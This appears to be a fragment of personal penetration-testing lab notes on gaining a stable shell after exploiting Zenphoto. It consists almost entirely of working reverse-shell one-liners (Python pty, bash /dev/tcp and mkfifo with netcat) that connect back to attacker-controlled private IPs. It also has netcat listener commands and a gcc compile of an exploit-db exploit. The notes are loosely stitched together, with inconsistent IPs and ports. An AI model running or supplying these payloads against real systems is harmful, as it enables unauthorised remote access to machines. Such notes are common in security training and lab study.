Zenphoto - exploit db - nc trick for stable shell

Stable Shell We now have a shell on the target machine and we are running as the user www-data. I found with this shell that when you try changing directories or running scripts it would have unexpected behaviour.

I performed a quick check to see if python was installed using which python. After confirming Python is installed I tried a quick one liner reverse shell to see if we can get a more stable one.

First I started a netcat listener on my attacking machine:

Copy sudo nc -lvp 443 The run the following command on the target machine:

Copy

python -c 'import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.221",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'

bash -c 'bash -i >& /dev/tcp/192.168.45.231/4444 0>&1'

gcc 15285.c -o 15285 -std=gnu89 -w

#cool.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.202 4444 >/tmp/f

chmod +x /tmp/nc
#start nc listener at kali
nc -nlvp 4444
#go back james execute nc
bash -i >& /dev/tcp/$kaliIP/4444 0>&1